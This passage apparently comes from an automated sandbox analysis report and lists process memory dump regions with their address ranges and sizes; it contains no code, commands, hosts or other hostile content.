                                                                                                                          • memory/4952-351-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4968-158-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4980-342-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4980-354-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5044-240-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5100-159-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5144-327-0x0000000006D10000-0x0000000006D11000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-328-0x0000000006DD0000-0x0000000006DD1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-308-0x0000000006B90000-0x0000000006B91000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-322-0x0000000007450000-0x0000000007451000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-323-0x00000000074C0000-0x00000000074C1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-282-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-344-0x0000000000FE3000-0x0000000000FE4000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-312-0x0000000006D60000-0x0000000006D61000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-288-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-345-0x0000000000FE4000-0x0000000000FE6000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/5144-329-0x0000000007BB0000-0x0000000007BB1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-295-0x0000000006E20000-0x0000000006E21000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5144-271-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5144-294-0x0000000000FE2000-0x0000000000FE3000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5148-257-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5268-355-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5292-274-0x0000000000402F68-mapping.dmp
                                                                                                                          • memory/5292-273-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            48KB

                                                                                                                          • memory/5324-348-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5340-277-0x0000000002BB0000-0x0000000002C5E000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            696KB

                                                                                                                          • memory/5340-324-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5340-258-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5404-261-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5428-330-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5468-361-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5520-341-0x0000000000400000-0x0000000002FCF000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            43.8MB

                                                                                                                          • memory/5520-326-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5544-367-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5592-353-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5624-262-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5628-362-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5664-346-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5664-347-0x00000000071F0000-0x00000000071F1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/5768-338-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5844-263-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5844-289-0x0000000000400000-0x0000000002BA7000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            39.7MB

                                                                                                                          • memory/5844-283-0x00000000001D0000-0x00000000001D9000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            36KB

                                                                                                                          • memory/5864-339-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5944-266-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5944-297-0x0000000005050000-0x000000000595B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            9.0MB

                                                                                                                          • memory/5944-298-0x0000000000400000-0x0000000002FCF000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            43.8MB

                                                                                                                          • memory/5944-349-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5944-369-0x0000000000000000-mapping.dmp